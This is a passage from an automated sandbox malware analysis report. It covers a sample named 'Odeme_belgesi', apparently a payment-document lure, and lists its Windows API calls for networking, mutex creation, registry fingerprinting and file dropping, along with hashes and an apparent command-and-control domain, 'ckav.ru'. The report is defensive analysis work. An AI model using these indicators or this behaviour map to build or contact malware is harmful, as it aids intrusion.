                • GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_Odeme_belgesi.jbxd
                Yara matches
                Similarity
                • API ID: _wmemset$ErrorInformationLastToken
                • String ID: IDA$IDA
                • API String ID: 487585393-2020647798
                • Opcode ID: d0395f9089772e9078c0cbeb7e7a69d574c5e4bdcef80e12950fd19a5f1576fd
                • Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
                • Opcode Fuzzy Hash: d0395f9089772e9078c0cbeb7e7a69d574c5e4bdcef80e12950fd19a5f1576fd
                • Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 536 404e17-404e57 getaddrinfo 537 404e59-404e5b 536->537 538 404e5d-404e84 call 402b7c socket 536->538 539 404ecf-404ed3 537->539 542 404e86-404e96 call 402bab freeaddrinfo 538->542 543 404e98-404ea7 connect 538->543 553 404ec7-404ec9 542->553 545 404eb3-404ebe freeaddrinfo 543->545 546 404ea9-404eb1 call 404de5 543->546 547 404ec0-404ec6 call 402bab 545->547 548 404ecb 545->548 546->545 547->553 552 404ecd-404ece 548->552 552->539 553->552
                APIs
                • getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
                • socket.WS2_32(?,?,?), ref: 00404E7A
                • freeaddrinfo.WS2_32(00000000), ref: 00404E90
                Memory Dump Source
                • Source File: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_Odeme_belgesi.jbxd
                Yara matches
                Similarity
                • API ID: freeaddrinfogetaddrinfosocket
                • String ID:
                • API String ID: 2479546573-0
                • Opcode ID: d0cbd2bfe5b0935c94ba089aae0b4a72727b205c69b8882af43eb62a71f59e55
                • Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
                • Opcode Fuzzy Hash: d0cbd2bfe5b0935c94ba089aae0b4a72727b205c69b8882af43eb62a71f59e55
                • Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 556 4040bb-4040f2 call 4031e5 CreateFileW 559 4040f8-404111 call 4031e5 556->559 560 40418d-404190 556->560 571 404113-404119 559->571 572 40417a 559->572 562 404192-4041a7 call 403c90 560->562 563 404184 560->563 562->563 568 4041a9-4041b8 call 403c59 562->568 565 404186-40418c 563->565 576 4041ba-4041d8 call 4040bb call 403d44 568->576 577 4041db-4041e4 call 402bab 568->577 571->572 575 40411b-404120 571->575 574 40417d-40417e call 403c40 572->574 583 404183 574->583 579 404122 575->579 580 404124-404140 call 4031e5 VirtualAlloc 575->580 576->577 577->565 579->580 580->572 589 404142-40415e call 4031e5 ReadFile 580->589 583->563 589->574 593 404160-404178 call 4031e5 589->593 593->574
                APIs
                • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
                • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
                • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_Odeme_belgesi.jbxd
                Yara matches
                Similarity
                • API ID: File$AllocCreateReadVirtual
                • String ID: .tmp
                • API String ID: 3585551309-2986845003
                • Opcode ID: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                • Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
                • Opcode Fuzzy Hash: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                • Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9
                APIs
                • SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
                • CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
                • GetLastError.KERNEL32 ref: 0041399E
                Memory Dump Source
                • Source File: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_Odeme_belgesi.jbxd
                Yara matches
                Similarity
                • API ID: Error$CreateLastModeMutex
                • String ID:
                • API String ID: 3448925889-0
                • Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                • Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
                • Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                • Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E
                APIs
                • CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
                • WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334
                Memory Dump Source
                • Source File: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_Odeme_belgesi.jbxd
                Yara matches
                Similarity
                • API ID: File$CreatePointerWrite
                • String ID:
                • API String ID: 3672724799-0
                • Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                • Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
                • Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                • Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8
                APIs
                • CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53
                  • Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F
                  • Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                  • Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_Odeme_belgesi.jbxd
                Yara matches
                Similarity
                • API ID: Heap$CreateFreeProcessThread_wmemset
                • String ID: ckav.ru
                • API String ID: 2915393847-2696028687
                • Opcode ID: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                • Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
                • Opcode Fuzzy Hash: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                • Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED
                APIs
                  • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                  • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                • _wmemset.LIBCMT ref: 0040634F
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_Odeme_belgesi.jbxd
                Yara matches
                Similarity
                • API ID: Heap$AllocateProcess_wmemset
                • String ID: CA
                • API String ID: 2773065342-1052703068
                • Opcode ID: cab46f4d188c0a5189c49f3585cfa10eddaab0cbfa80d2b27664b61f9bed3b3c
                • Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
                • Opcode Fuzzy Hash: cab46f4d188c0a5189c49f3585cfa10eddaab0cbfa80d2b27664b61f9bed3b3c
                • Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD
                APIs
                • GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_Odeme_belgesi.jbxd
                Yara matches
                Similarity
                • API ID: InformationToken
                • String ID: IDA
                • API String ID: 4114910276-365204570
                • Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                • Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
                • Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                • Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95
                APIs
                • GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_Odeme_belgesi.jbxd
                Yara matches
                Similarity
                • API ID: AddressProc
                • String ID: s1@
                • API String ID: 190572456-427247929
                • Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                • Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
                • Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                • Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4
                APIs
                  • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                  • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                • RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
                • RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC
                Memory Dump Source
                • Source File: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_Odeme_belgesi.jbxd
                Yara matches
                Similarity
                • API ID: Heap$AllocateOpenProcessQueryValue
                • String ID:
                • API String ID: 1425999871-0
                • Opcode ID: 18f61375b21b2ca1c3d5cfb75848ec819ade9bcc4ac2f6c13c281ff8ddb16e17
                • Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
                • Opcode Fuzzy Hash: 18f61375b21b2ca1c3d5cfb75848ec819ade9bcc4ac2f6c13c281ff8ddb16e17
                • Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9
                APIs
                • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115
                Memory Dump Source
                • Source File: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_Odeme_belgesi.jbxd
                Yara matches
                Similarity
                • API ID: CheckMembershipToken
                • String ID:
                • API String ID: 1351025785-0
                • Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                • Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
                • Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                • Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764
                APIs
                • CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B
                Memory Dump Source
                • Source File: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_Odeme_belgesi.jbxd
                Yara matches
                Similarity
                • API ID: CreateDirectory
                • String ID:
                • API String ID: 4241100979-0
                • Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                • Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
                • Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                • Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4
                APIs
                • GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445
                Memory Dump Source
                • Source File: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_Odeme_belgesi.jbxd
                Yara matches
                Similarity
                • API ID: InfoNativeSystem
                • String ID:
                • API String ID: 1721193555-0
                • Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                • Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
                • Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                • Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5
                APIs
                • send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07
                Memory Dump Source
                • Source File: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_Odeme_belgesi.jbxd
                Yara matches
                Similarity
                • API ID: send
                • String ID:
                • API String ID: 2809346765-0
                • Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                • Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
                • Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                • Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98
                APIs
                • MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB
                Memory Dump Source
                • Source File: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_Odeme_belgesi.jbxd
                Yara matches
                Similarity
                • API ID: FileMove
                • String ID:
                • API String ID: 3562171763-0
                • Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                • Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
                • Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                • Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664
                APIs
                • WSAStartup.WS2_32(00000202,?), ref: 00404E08
                Memory Dump Source
                • Source File: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_Odeme_belgesi.jbxd
                Yara matches
                Similarity
                • API ID: Startup
                • String ID:
                • API String ID: 724789610-0
                • Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                • Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
                • Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                • Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2
                APIs
                • SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297
                Memory Dump Source
                • Source File: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_Odeme_belgesi.jbxd
                Yara matches
                Similarity
                • API ID: AttributesFile
                • String ID:
                • API String ID: 3188754299-0
                • Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                • Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
                • Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                • Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8
                APIs
                • RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35
                Memory Dump Source
                • Source File: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_Odeme_belgesi.jbxd
                Yara matches
                Similarity
                • API ID: Open
                • String ID:
                • API String ID: 71445658-0
                • Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                • Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
                • Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                • Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658
                APIs
                • DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D
                Memory Dump Source
                • Source File: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_Odeme_belgesi.jbxd
                Yara matches
                Similarity
                • API ID: DeleteFile
                • String ID:
                • API String ID: 4033686569-0
                • Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                • Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
                • Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                • Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8
                APIs
                • LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34
                Memory Dump Source
                • Source File: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_Odeme_belgesi.jbxd
                Yara matches
                Similarity
                • API ID: LibraryLoad
                • String ID:
                • API String ID: 1029625771-0
                • Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                • Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
                • Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                • Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5
                APIs
                • FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04
                Memory Dump Source
                • Source File: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_Odeme_belgesi.jbxd
                Yara matches
                Similarity
                • API ID: CloseFind
                • String ID:
                • API String ID: 1863332320-0
                • Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                • Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
                • Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                • Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4
                APIs
                • GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC
                Memory Dump Source
                • Source File: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_Odeme_belgesi.jbxd
                Yara matches
                Similarity
                • API ID: AttributesFile
                • String ID:
                • API String ID: 3188754299-0
                • Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                • Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
                • Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                • Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4
                APIs
                • RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15
                Memory Dump Source
                • Source File: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_Odeme_belgesi.jbxd
                Yara matches
                Similarity
                • API ID: Close
                • String ID:
                • API String ID: 3535843008-0
                • Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                • Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
                • Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                • Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099
                APIs
                • PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A
                Memory Dump Source
                • Source File: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_Odeme_belgesi.jbxd
                Yara matches
                Similarity
                • API ID: ExistsFilePath
                • String ID:
                • API String ID: 1174141254-0
                • Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                • Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
                • Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                • Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199
                APIs
                • closesocket.WS2_32(00404EB0), ref: 00404DEB
                Memory Dump Source
                • Source File: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_Odeme_belgesi.jbxd
                Yara matches
                Similarity
                • API ID: closesocket
                • String ID:
                • API String ID: 2781271927-0
                • Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                • Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
                • Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                • Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8
                APIs
                • VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA
                Memory Dump Source
                • Source File: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_Odeme_belgesi.jbxd
                Yara matches
                Similarity
                • API ID: FreeVirtual
                • String ID:
                • API String ID: 1263568516-0
                • Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                • Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
                • Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                • Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8
                APIs
                • CloseHandle.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55
                Memory Dump Source
                • Source File: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_Odeme_belgesi.jbxd
                Yara matches
                Similarity
                • API ID: CloseHandle
                • String ID:
                • API String ID: 2962429428-0
                • Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                • Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
                • Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                • Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4
                APIs
                • Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487
                Memory Dump Source
                • Source File: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_Odeme_belgesi.jbxd
                Yara matches
                Similarity
                • API ID: Sleep
                • String ID:
                • API String ID: 3472027048-0
                • Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                • Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
